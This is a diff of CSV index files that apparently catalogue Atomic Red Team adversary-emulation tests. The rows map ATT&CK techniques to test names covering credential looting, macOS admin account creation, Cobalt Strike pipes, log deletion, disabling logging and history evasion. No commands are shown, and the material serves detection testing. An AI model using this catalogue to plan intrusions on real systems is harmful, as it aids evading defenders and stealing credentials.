+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+privilege-escalation,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 privilege-escalation,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -735,6 +765,11 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scrip
 execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
 execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
 execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
+execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
+execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
+execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
+execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
+execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -751,6 +786,7 @@ execution,T1569.002,System Services: Service Execution,1,Execute a Command as a
 execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
 execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
 execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
+execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
@@ -778,6 +814,7 @@ persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify
 persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
 persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
+persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
 persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
@@ -885,6 +922,7 @@ persistence,T1505.004,IIS Components,2,Install IIS Module using PowerShell Cmdle
 persistence,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 persistence,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 persistence,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
+persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process,adae83d3-0df6-45e7-b2c3-575f91584577,powershell
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile and .bashrc,3,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
@@ -926,8 +964,11 @@ persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 persistence,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-persistence,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-persistence,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+persistence,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+persistence,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
 persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
@@ -1016,9 +1057,9 @@ credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,ae
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
-credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
-credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
-credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
+credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
+credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -1177,6 +1218,7 @@ discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b67
 discovery,T1033,System Owner/User Discovery,3,Find computers where user has session - Stealth mode (PowerView),29857f27-a36f-4f7e-8084-4557cd6207ca,powershell
 discovery,T1033,System Owner/User Discovery,4,User Discovery With Env Vars PowerShell Script,dcb6cdee-1fb0-4087-8bf8-88cfd136ba51,powershell
 discovery,T1033,System Owner/User Discovery,5,GetCurrent User with PowerShell Script,1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b,powershell
+discovery,T1033,System Owner/User Discovery,6,System Discovery - SocGholish whoami,3d257a03-eb80-41c5-b744-bb37ac7f65c7,powershell
 discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
@@ -1320,6 +1362,7 @@ discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
 discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
 discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
+discovery,T1057,Process Discovery,6,Discover Specific Process - tasklist,11ba69ee-902e-4a0f-b3b6-418aed7d7ddb,command_prompt
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,2,Basic Permission Groups Discovery Windows (Local),1f454dd6-e134-44df-bebb-67de70fb6cd8,command_prompt
 discovery,T1069.001,Permission Groups Discovery: Local Groups,3,Permission Groups Discovery PowerShell (Local),a580462d-2c19-4bc7-8b9a-57a41b7d3ba4,powershell
@@ -1344,7 +1387,8 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,4,Disco
 discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
 discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
-discovery,T1012,Query Registry,2,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
+discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
+discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -1464,6 +1508,8 @@ impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption
 impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
+impact,T1531,Account Access Removal,4,Azure AD - Delete user via Azure AD PowerShell,4f577511-dc1c-4045-bcb8-75d2457f01f4,powershell
+impact,T1531,Account Access Removal,5,Azure AD - Delete user via Azure CLI,c955c1c7-3145-4a22-af2d-63eea0d967f0,powershell
 impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
 impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
 impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
@@ -1504,8 +1550,11 @@ initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service A
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
-initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,3,Create local account with admin privileges using sysadminctl utility - MacOS,191db57d-091a-47d5-99f3-97fde53de505,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,4,Enable root account using dsenableroot utility - MacOS,20b40ea9-0e17-4155-b8e6-244911a678ac,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,5,Add a new/existing user to the admin group using dseditgroup utility - macOS,433842ba-e796-4fd5-a14f-95d3a1970875,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,6,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Valid Accounts: Local Accounts,7,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -22,8 +22,9 @@ defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Cachi
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
-defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
-defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,13,Delete system journal logs via rm and journalctl utilities,ca50dd85-81ff-48ca-92e1-61f119cb1dcf,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,14,Overwrite Linux Mail Spool,1602ff76-ed7f-4c94-b550-2f727b4782d4,bash
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,15,Overwrite Linux Log,d304b2dc-90b4-4465-a650-16ddd503f7b5,bash
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
@@ -38,6 +39,8 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,7,Linux Base64 Encoded Shebang in CLI,3a15c372-67c1-4430-ac8e-ec06d641ce4d,sh
+defense-evasion,T1562,Impair Defenses,2,Disable journal logging via systemctl utility,c3a377f9-1203-4454-aa35-9d391d34768f,sh
+defense-evasion,T1562,Impair Defenses,3,Disable journal logging via sed utility,12e5551c-8d5c-408e-b3e4-63f53b03379f,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -52,6 +55,7 @@ defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,13,
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,14,Edit UFW firewall main configuration file,7b697ece-8270-46b5-bbc7-6b9e27081831,sh
 defense-evasion,T1562.004,Impair Defenses: Disable or Modify System Firewall,15,Tail the UFW firewall log file,419cca0c-fa52-4572-b0d7-bc7c6f388a27,sh
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
+defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
 defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
@@ -65,6 +69,11 @@ defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configu
 defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
 defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
+defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
@@ -173,8 +182,8 @@ credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to
 credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
 credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
 credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
-credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
-credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
+credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
+credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
 credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -16,6 +16,17 @@ defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Cachi
 defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
 defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,1,rm -rf,989cc1b1-3642-4260-a809-54f9dd559683,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,2,Delete log files using built-in log utility,653d39cd-bae7-499a-898c-9fb96b8b5cd1,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,3,Truncate system log files via truncate utility,6290f8a8-8ee9-4661-b9cf-390031bf6973,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,4,Delete log files via cat utility by appending /dev/null or /dev/zero,c23bdb88-928d-493e-b46d-df2906a50941,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,5,System log file deletion via find utility,bc8eeb4a-cc3e-45ec-aa6e-41e973da2558,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,6,Overwrite macOS system log via echo utility,0208ea60-98f1-4e8c-8052-930dce8f742c,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,7,Real-time system log clearance/deletion,848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,8,Delete system log files via unlink utility,03013b4b-01db-437d-909b-1fdaa5010ee8,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,9,Delete system log files using shred utility,86f0e4d5-3ca7-45fb-829d-4eda32b232bb,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,10,Delete system log files using srm utility,b0768a5e-0f32-4e75-ae5b-d036edcf96b6,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,11,Delete system log files using OSAScript,810a465f-cd4f-47bc-b43e-d2de3b033ecc,sh
+defense-evasion,T1070.002,Indicator Removal on Host: Clear Linux or Mac System Logs,12,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
 defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
@@ -33,6 +44,7 @@ defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's mo
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
 defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
+defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
 defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
 defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
@@ -64,6 +76,9 @@ defense-evasion,T1564.001,Hide Artifacts: Hidden Files and Directories,5,Hidden
